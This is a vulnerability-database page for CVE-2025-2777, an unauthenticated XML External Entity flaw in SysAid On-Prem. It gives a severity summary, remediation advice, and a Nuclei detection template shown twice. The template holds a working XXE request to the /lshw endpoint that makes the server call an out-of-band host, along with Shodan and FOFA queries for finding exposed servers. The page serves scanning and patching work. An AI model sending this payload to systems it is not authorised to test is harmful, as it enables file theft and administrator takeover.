SysAid On-Prem <= 23.3.40 - XML External Entity

CVE-2025-2777

Verified

Description

SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the lshw processing functionality, allowing for administrator account takeover and file read primitives.

Severity

Critical

CVSS Score

9.3

Exploit Probability

23%

Affected Product

sysaid

Published Date

May 10, 2025

Template Author

johnk3r

CVE-2025-2777.yaml

id: CVE-2025-2777

info:
  name: SysAid On-Prem <= 23.3.40 - XML External Entity
  author: johnk3r
  severity: critical
  description: |
    SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the lshw processing functionality, allowing for administrator account takeover and file read primitives.
  impact: |
    Unauthenticated attackers can exploit XXE vulnerabilities in the lshw endpoint to read arbitrary files, potentially leading to administrator account takeover and complete system compromise.
  remediation: |
    Upgrade to SysAid On-Prem version 24.40.60 or later that properly disables external entity processing.
  reference:
    - https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/
    - https://documentation.sysaid.com/docs/24-40-60
  classification:
    epss-score: 0.23107
    epss-percentile: 0.96003
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
    cvss-score: 9.3
    cve-id: CVE-2025-2777
    cwe-id: CWE-611
  metadata:
    max-request: 1
    vendor: sysaid
    product: sysaid
    shodan-query: http.favicon.hash:"1540720428"
    fofa-query: icon_hash=1540720428
  tags: cve,cve2025,oast,sysaid,xxe,vkev,vuln

variables:
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /lshw?osVer=a&osCode=b&osKernel=c&agentVersion=e&serial=f HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0" ?>
        <!DOCTYPE foo [
        <!ENTITY % foo SYSTEM "http://{{interactsh-url}}/{{filename}}.dtd">
        %foo;
        ]>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Java"
# digest: 490a004630440220136172ea51a12c6b2888305246b401978814c6566688323f96b4db516abe207b02203ea0b918c95f3b749e80402f47bc193647011740dd28da3cd25d4d9a06a56a8b:922c64590222798bb761d5b6d8e72950

9.3Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

CVE ID:

cve-2025-2777

CWE ID:

cwe-611

References

https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/https://documentation.sysaid.com/docs/24-40-60

Remediation Steps

Upgrade to SysAid On-Prem version 24.40.60 or later that properly disables external entity processing.

id: CVE-2025-2777

info:
  name: SysAid On-Prem <= 23.3.40 - XML External Entity
  author: johnk3r
  severity: critical
  description: |
    SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the lshw processing functionality, allowing for administrator account takeover and file read primitives.
  impact: |
    Unauthenticated attackers can exploit XXE vulnerabilities in the lshw endpoint to read arbitrary files, potentially leading to administrator account takeover and complete system compromise.
  remediation: |
    Upgrade to SysAid On-Prem version 24.40.60 or later that properly disables external entity processing.
  reference:
    - https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/
    - https://documentation.sysaid.com/docs/24-40-60
  classification:
    epss-score: 0.23107
    epss-percentile: 0.96003
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
    cvss-score: 9.3
    cve-id: CVE-2025-2777
    cwe-id: CWE-611
  metadata:
    max-request: 1
    vendor: sysaid
    product: sysaid
    shodan-query: http.favicon.hash:"1540720428"
    fofa-query: icon_hash=1540720428
  tags: cve,cve2025,oast,sysaid,xxe,vkev,vuln

variables:
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /lshw?osVer=a&osCode=b&osKernel=c&agentVersion=e&serial=f HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0" ?>
        <!DOCTYPE foo [
        <!ENTITY % foo SYSTEM "http://{{interactsh-url}}/{{filename}}.dtd">
        %foo;
        ]>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Java"
# digest: 490a004630440220136172ea51a12c6b2888305246b401978814c6566688323f96b4db516abe207b02203ea0b918c95f3b749e80402f47bc193647011740dd28da3cd25d4d9a06a56a8b:922c64590222798bb761d5b6d8e72950

SysAid On-Prem <= 23.3.40 - XML External Entity

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

SysAid On-Prem <= 23.3.40 - XML External Entity

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps